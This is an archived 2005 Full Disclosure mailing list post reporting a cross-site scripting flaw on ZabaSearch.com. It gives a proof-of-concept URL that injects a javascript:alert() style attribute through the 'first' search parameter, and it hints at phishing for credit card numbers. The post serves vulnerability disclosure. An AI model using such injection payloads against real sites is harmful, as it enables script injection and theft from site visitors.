Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

ZabaSearch.com XSS
From: "bitlance winter" <bitlance_3 () hotmail com>
Date: Mon, 16 May 2005 05:06:48 +0000

Hello.

ZabaSearch.com XSS  8-(
Unbelievable.

Please Input your Credit Card Number...

http://www.zabasearch.com/find_anyone_form_t.php?first=f"style=
background-image:url(javascript:alert());"

See also .
http://www.wired.com/news/privacy/0,1848,67407,00.html
02:00 AM May. 06, 2005 PT

bitlance winter

_________________________________________________________________
Don’t just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]